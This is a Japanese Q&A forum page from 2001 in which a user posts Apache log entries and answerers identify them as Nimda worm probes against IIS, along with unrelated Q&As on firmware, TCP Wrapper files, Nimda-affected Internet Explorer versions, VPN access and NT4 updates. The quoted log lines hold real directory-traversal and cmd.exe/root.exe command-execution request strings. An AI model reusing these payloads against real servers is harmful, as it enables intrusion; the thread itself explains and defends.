apacheのログで3日ほど前から以下の様なアクセスが
いろいろなIPアドレスから来るのですが
何をやろうとしているのでしょうか?

211.196.98.124 - - [20/Sep/2001:03:32:52 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 280
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 278
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288
211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302
211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 319
中略
211.196.98.124 - - [20/Sep/2001:03:32:57 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302
211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302

なんとなくdirコマンドでCドライブの内容を調べようとしているのはわかるのですが…
環境はWinNT4.0sp4 apache 1.3.20です。

あと、エラーコード(?)の403と404は知っているのですが
400はどういう意味なのでしょうか?

また何か問題はあるのでしょうか?

このQ&Aに関連する最新のQ&A

A 回答 (2件)

NIMDAのアタックログです。


ですがIISのセキュリティホールを狙ったものですので、
Apacheには感染の危険性はありません。
IISには大ざっぱに言うと、とあるセキュリティホールを
突くと、Webディレクトリからシステムディレクトリへ侵入するという
大穴があります。上記はそれを狙ったもので、『root.exe』を
リクエストしているのは、もしそのIISがCodeRedに感染していた
場合は、そのバックドアを利用して侵入を図ろう、というものです。
(ちなみに、次回はIPは伏せた方が良いと思いますよ。)
    • good
    • 0

おそらくNIMDAウイルスが侵入しようとした跡でしょう。


詳細はGooニュース
http://channel.goo.ne.jp/news/mycom/it/20010920/ …
を参照してください。

400 -Bad Request は「間違ったURLを入力したのでサーバが理解できなかった」です。
    • good
    • 0

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aと関連する良く見られている質問

QIO-DATA WN-G54/R4のファームウェア1.0を探しているのですがどこにあるのでしょうか?

タイトルのとおりIO-DATA WN-G54/R4のファームver1.0を探しています。サポートソフトウェア1.0に入っているのかと思いましたがどれがどれだかわかりません。
どなたかこの機種のファームを上記バージョンへデグレードする手順をご存知の方がおられましたら教えていただきたいと思っております。

Aベストアンサー

こんにちは。

ファームウェアをダウングレードしたいのですか?
IO DATAは分かりませんが、ダウングレードは通常保証外となります。

1.10ならあるのですが…
http://www.iodata.jp/lib/product/w/1932_winxp_old.htm
1.00はもう配布されていませんね。
CDをお持ちなら、wng54r4_100f.binとかそういうファイルだと思いますけど。
ファイル検索で探してみては?

Q/etc/hosts.allow 及び /etc/hosts.deny について

/etc/hosts.allow 及び /etc/hosts.deny は
Tcp Wrapper のみが参照するファイルなんでしょうか?
それとも inetd が参照するファイルなんでしょうか?
素人な質問ですみません。

Aベストアンサー

TCP Wrapper 本体 (tcpd)、TCP Wrapper のライブラリをリンクしたアプリケーション (xinetd など)、独自に /etc/hosts.allow や /etc/hosts.deny を参照するように実装されたプログラムが参照します。

従って、

> Tcp Wrapper のみが参照するファイルなんでしょうか?

この回答は No となります。

> それとも inetd が参照するファイルなんでしょうか?

inetd は /etc/hosts.allow および /etc/hosts.deny を参照しないので、これも No となります。

Qウイルス「W32/Nimda」

インターネットで調べるとNimda ワーム の影響を受ける恐れのある製品は
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1とあります。
しかし、私の使っているIEのバージョンは
5.00.2919.6307です。
この場合はどうしたらよいのでしょうか?

また、雑誌の付録のCDで5.0にバージョンアップする場合、お気に入りやアドレス帳、送受信したメール等のバックアップは必要でしょうか?
お願いします。

Aベストアンサー

お使いのバージョンは、Nimdaワームに感染してしまう可能性がある Internet Explorer 5.01です。
Internet Explorer 5.01 SP2/5.5 SP2/6のいずれかにバージョンアップすることをオススメします。

また、バージョンアップしても、お気に入りやアドレス帳、送受信したメール等は、そのまま引き継がれますが、念のためバックアップは採った方が良いと思います。

参考URL:http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

Q【接続】403Forbiddenのページにアクセス

職場のとある管理ページにアクセスしたいのですが
職場から接続するIPからしか
接続できないような設定になっているため
外部から接続することができません。

アクセス許可の与えられているIPは分かっています。

プロキシをさす等して、なんとか外部から
アクセス制限のあるページにアクセスすることはできないでしょうか?

※職場には外部からのアクセスを試みる了承は得ています。

Aベストアンサー

>職場のとある管理ページにアクセスしたい
これはサーバは社内にあるということ?
それとも社外にあるということ?

どちらにしても社内でVPNサーバ駆動させて
外部から一旦VPN接続してやれば
以後は社内アクセスと同様になります

最近同様な質問に回答してますがIPを固定化出来れば
それでいいという話であれば
有料で固定IPにすることも可能です
  自前でVPNサーバ起動ができれば必要ないですが
  できない場合には使えます
  (この場合サーバ設定にIP追加設定する必要はあります)
http://www.interlink.or.jp/service/myip/index.html

QWinNT4.0のアップデートについて

WinNT4.0のWindows Updateが出来ずに困っています。(615058の質問の続きです。)

『Windows Updateとは何か』をあいまいにしたまま質問すると、質問がぼやけてしまいますので、まず自分の中での『Windwos Updateとは何か』を述べてから質問したいと思います。

Windwos Updateとは・・・
本来の意味としては、ウインドウズにパッチファイルをあてて、好ましい状態に更新していくことであると考えています。
また、付属的な意味(?)としては、Windows Updateのサイトにアクセスし、自ウインドウズを診断してもらい、インストールすべきファイルを選択してもらう機能があるでしょう。(自分としてはそう考えています)

そこで質問ですが・・・
●Windwos Updateを上のように考えた場合、後者の機能(診断・ファイルの選択機能)は、WinNT4.0にサポートされているのでしょうか。

●もし、サポートされていない場合は数十個以上あるファイル(一応どんなファイルがあるのかは見てみました)から、適応されていないファイルをどのように選べばよいでしょうか。(WinNT4.0を他人から引き継いだので、これまでどのようなパッチファイルをあてたか不明です。)どこかのフォルダを探せば現状が分かるものなのでしょうか。

●サポートされている場合でも、自WinNT4.0ではうまく機能していません。Windows Updateのページを開こうとすると、「アクセスできません」というエラーが出ます。原因がわかりません。プロキシサーバー、アンチウイルスソフトによる制限はありません。

このあたりのことについて詳しい方、お返事いただけますでしょうか。

WinNT4.0のWindows Updateが出来ずに困っています。(615058の質問の続きです。)

『Windows Updateとは何か』をあいまいにしたまま質問すると、質問がぼやけてしまいますので、まず自分の中での『Windwos Updateとは何か』を述べてから質問したいと思います。

Windwos Updateとは・・・
本来の意味としては、ウインドウズにパッチファイルをあてて、好ましい状態に更新していくことであると考えています。
また、付属的な意味(?)としては、Windows Updateのサイトにアクセスし、自ウインドウズを診断...続きを読む

Aベストアンサー

●WindowsUpdateサイトの「オンライン拡張機能」の適用範囲にNT4は入っていないと思います。下記がソース。

http://v4.windowsupdate.microsoft.com/ja/about.asp?

●「オンライン拡張機能」対象外のNT4のユーザは。

▼Technetのダウンロードサイト
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/fix/winnt40sp6a.asp

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp?url=/japan/technet/security/fixedhome.asp

▼NT4のダウンロードサイト
http://www.microsoft.com/japan/ntworkstation/downloads/

#Windows95やNT4では、こうして対処してきました。また、Windows95・NT4・2000ともにパッチをダブってあてても不具合が出ることはありませんでした。

●WindowsUpdateサイトの「オンライン拡張機能」の適用範囲にNT4は入っていないと思います。下記がソース。

http://v4.windowsupdate.microsoft.com/ja/about.asp?

●「オンライン拡張機能」対象外のNT4のユーザは。

▼Technetのダウンロードサイト
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/fix/winnt40sp6a.asp

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp?url=/japan/technet/security/...続きを読む


人気Q&Aランキング

おすすめ情報